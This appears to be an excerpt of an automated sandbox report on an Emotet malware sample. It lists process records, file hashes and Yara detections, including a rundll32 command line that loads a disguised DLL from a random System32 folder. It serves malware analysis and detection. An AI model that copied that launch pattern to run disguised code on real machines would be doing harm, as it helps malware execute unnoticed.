                                                                                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.252637909.0000000003F50000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          Reputation:high

                                                                                                                                                                          General

                                                                                                                                                                          Start time:14:18:58
                                                                                                                                                                          Start date:25/11/2021
                                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Sxdbowjvh\qaursesh.cky",Control_RunDLL
                                                                                                                                                                          Imagebase:0x2a0000
                                                                                                                                                                          File size:61952 bytes
                                                                                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.644665975.0000000004820000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.642932572.0000000002730000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.645532661.0000000004CA0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.645241270.0000000004BC0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.645897262.0000000004EB0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.644831234.0000000004900000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.643684713.0000000002B90000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.645743036.0000000004DA0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.645105513.0000000004B60000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          Reputation:high

                                                                                                                                                                          General

                                                                                                                                                                          Start time:14:19:02
                                                                                                                                                                          Start date:25/11/2021
                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                          Imagebase:0x7ff797770000
                                                                                                                                                                          File size:51288 bytes
                                                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high

                                                                                                                                                                          General

                                                                                                                                                                          Start time:14:19:07
                                                                                                                                                                          Start date:25/11/2021
                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                          Imagebase:0x7ff797770000
                                                                                                                                                                          File size:51288 bytes
                                                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high

                                                                                                                                                                          General

                                                                                                                                                                          Start time:14:19:12
                                                                                                                                                                          Start date:25/11/2021
                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                                                                          Imagebase:0x7ff797770000
                                                                                                                                                                          File size:51288 bytes
                                                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high

                                                                                                                                                                          General

                                                                                                                                                                          Start time:14:19:13
                                                                                                                                                                          Start date:25/11/2021
                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                                                                          Imagebase:0x7ff797770000
                                                                                                                                                                          File size:51288 bytes
                                                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                          General

                                                                                                                                                                          Start time:14:19:14
                                                                                                                                                                          Start date:25/11/2021
                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                                                          Imagebase:0x7ff797770000
                                                                                                                                                                          File size:51288 bytes
                                                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                          General

                                                                                                                                                                          Start time:14:19:14
                                                                                                                                                                          Start date:25/11/2021
                                                                                                                                                                          Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                                                                          Imagebase:0x7ff7426c0000
                                                                                                                                                                          File size:163336 bytes
                                                                                                                                                                          MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                          General

                                                                                                                                                                          Start time:14:19:15
                                                                                                                                                                          Start date:25/11/2021
                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                                                                          Imagebase:0x7ff797770000
                                                                                                                                                                          File size:51288 bytes
                                                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                          General

                                                                                                                                                                          Start time:14:19:20
                                                                                                                                                                          Start date:25/11/2021
                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                          Imagebase:0x7ff797770000
                                                                                                                                                                          File size:51288 bytes
                                                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                          General

                                                                                                                                                                          Start time:14:19:37
                                                                                                                                                                          Start date:25/11/2021
                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                          Imagebase:0x7ff797770000
                                                                                                                                                                          File size:51288 bytes
                                                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                          General

                                                                                                                                                                          Start time:14:19:51
                                                                                                                                                                          Start date:25/11/2021
                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                          Imagebase:0x7ff797770000
                                                                                                                                                                          File size:51288 bytes
                                                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                          General

                                                                                                                                                                          Start time:14:20:16
                                                                                                                                                                          Start date:25/11/2021
                                                                                                                                                                          Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                                                                          Imagebase:0x7ff7e3fc0000
                                                                                                                                                                          File size:455656 bytes
                                                                                                                                                                          MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                          General

                                                                                                                                                                          Start time:14:20:16
                                                                                                                                                                          Start date:25/11/2021
                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                          Imagebase:0x7ff7ecfc0000
                                                                                                                                                                          File size:625664 bytes
                                                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                          Disassembly

                                                                                                                                                                          Code Analysis

                                                                                                                                                                          Reset < >